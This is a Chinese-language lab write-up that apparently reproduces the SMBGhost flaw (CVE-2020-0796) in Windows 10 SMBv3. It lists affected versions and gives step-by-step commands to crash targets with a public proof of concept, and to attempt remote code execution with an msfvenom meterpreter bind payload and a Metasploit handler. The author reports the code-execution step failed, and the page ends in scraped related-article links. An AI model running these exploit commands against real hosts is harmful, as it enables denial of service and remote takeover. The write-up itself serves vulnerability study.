文章目录

  • 一、漏洞简介:
  • 二、影响版本:
  • 三、实验环境:
  • 四、漏洞复现
    • 1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描
    • 2.蓝屏复现
    • 3.远程执行复现

一、漏洞简介:

3月12日,微软更新安全通告针对Windows SMBv3客户端/服务器远程代码执行漏洞紧急发布了安全补丁,确定该漏洞编号为CVE-2020-0796。

Microsoft Server Message Block 3.1.1(SMBv3)协议在处理某些请求的方式中存在代码执行漏洞。攻击者可以精心构造数据包发送到SMB服务器,无需经过身份验证,即可在目标服务器上执行任意代码。攻击者可通过部署一台恶意SMB v3服务器,并诱导用户(客户端)连接到该服务器,一旦目标用户连接,即可在计算机上执行攻击者自定义的恶意代码。

由于上述漏洞易被蠕虫利用传播恶意程序,推测可能在未来会成为恶意软件和攻击者广泛利用的漏洞,与WannaCry(2017年5月“永恒之蓝”)漏洞较为相似。目前漏洞细节已公开,请相关用户安装补丁进行防护。

二、影响版本:

该漏洞存在于 Windows 10 版本 1903 中添加的一项新功能中。Windows 的早期版本不支持 SMBv3.1.1 压缩并且不受影响。

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)

三、实验环境:

靶机:192.168.159.129(Windows10 1903)

靶机:192.168.159.130(Windows10 1909)2020.1月更新的版本

攻击机:192.168.159.131(kali 2021-05-31)

四、漏洞复现

1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描

下载链接:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

2.蓝屏复现

下载蓝屏POC
git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
安装POC
python3 setup.py install
进行攻击
python3 CVE-2020-0796.py 192.168.159.130

3.远程执行复现

下载安装exp
git clone https://github.com/root-tools/SMBGhost_RCE_PoC生成payload
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -b '\x00' -f python > exploit-p 指定 payload LPORT 目标主机执行程序后打开的侦听端口 -b 去掉坏字符,坏字符会影响 payload 正常执行。 > exploit 将生成的 payload 代码保存到文件 exploit 中 \x00 代表16进制的“00”组成的字符串。通过ASCII码换成能识别的就是:"00" - "00000000"- NUL。由于"00000000"是不可见字符,所以代码中没用。

把参数buf改为USER_PAYLOAD

替换exploit.py里的代码

执行替换后的exp
python3 exploit.py -ip 192.168.159.130

启动msf监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 192.168.159.130
msf6 exploit(multi/handler) > exploit

不过,我在这里没做出来。。。无论怎么搞都是只能蓝屏不能反弹shell,懵逼ing

永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)相关推荐

  1. 【漏洞通告】微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)PoC公开处置手册

    [漏洞通告]微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)PoC公开处置手册 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)

  2. 更新 | 远程命令执行POC被公开发布:微软SMBv3服务远程代码执行漏洞(CVE-2020-0796)通告

    更新 | 远程命令执行POC被公开发布:微软SMBv3服务远程代码执行漏洞(CVE-2020-0796)通告 原创 红雨滴团队 [奇安信威胁情报中心](javascript:void(0)

  3. [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  4. sqlserver 获取当前年_CVE-2020-0618: 微软 SQL Server 远程代码执行漏洞通告

    报告编号:B6-2020-021601

  5. [网络安全自学篇] 六十四.Windows安全缺陷利用之SMBv3服务远程代码执行(CVE-2020-0796)复现及防御机理

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了hack the box的OpenAdmin题目,结合Nmap.Gob ...

  6. 微软远程桌面服务远程代码执行漏洞

    人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当 ...

  7. rmi远程代码执行漏洞_微软 Windows DNS Server 远程代码执行漏洞

    安全预警 漏洞:微软 Windows DNS Server 远程代码执行漏洞漏洞编号:CVE-2020-1350威胁程度:高影响范围: Windows Server 2008 for 32-bit S ...

  8. 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)

    漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...

  9. js word 预览_微软补丁日:Word/DHCP/LNK远程代码执行漏洞预警

    漏洞背景 2019年8月14日微软发布的安全更新中除了RDP漏洞还涵盖了针对多个远程代码执行高危漏洞的修复. Microsoft Word远程代码执行漏洞, 漏洞编号CVE-2019-0585. Wi ...

  10. c++获取一段代码的执行时间_微软IE浏览器JScript脚本引擎远程代码执行漏洞通告...

    文档信息 编号 QiAnXinTI-SV-2019-0022 关键字 IE JScript RCE 远程命令执行CVE-2019-1367 发布日期 2019年09月24日 更新日期 2019年09月 ...

最新文章

  1. Markdown入门简介
  2. 字符串数组(就自己做个笔记)
  3. -lt -gt -ge -le -eq的意义
  4. 区块链:这项颠覆性技术将如何改变未来
  5. java 开票金额拆分_关于开票尾差拆分凑整的算法问题
  6. 科大星云诗社动态20210503
  7. linux 页面内容输出,Node.js 一个简单的页面输出
  8. 关于空值null的排序问题 mysql 和oracle
  9. linux笔记之常用的基本命令
  10. Codeforces Round #656 (Div. 3)
  11. ZT Web Control 开发系列(一) 页面的生命周期
  12. (SPFA+最短路变形+回路对起点的影响)Arbitrage
  13. 【资源下载】清华姚班、普林斯顿博士、斯坦福大学助理教授马腾宇博士论文下载——2018ACM最佳博士论文提名
  14. Cocos2D中图片加-hd后缀的说明
  15. linux下的锐捷客户端
  16. 欧拉定理和费马小定理
  17. 家用双千兆路由器推荐_千兆以上(专业级)无线路由器路由器哪款好
  18. 利用asp.net Core开发webapi对接云之家智能审批数据互联控件
  19. 微积分的历史(五):发展之泰勒公式(上)
  20. JAVA IO流(韩顺平)

热门文章

  1. java 传参数报文给and_技术岛-技术改变生活
  2. Hive-内置函数:根据身份证规则从身份证号提取年龄和性别
  3. S4 HANA 1809 FPS03 Standard装机总结(刘欣2019.11.7)
  4. 【HTML】图片标签(img)
  5. Map获取key值和value值
  6. java三国演义_《三国演义》歌曲精品全集
  7. 密码学算法——RSA
  8. 英语语音篇 - 元音自然拼读
  9. 对比stm32,arm9研究方向
  10. Python 中的 dbm 模块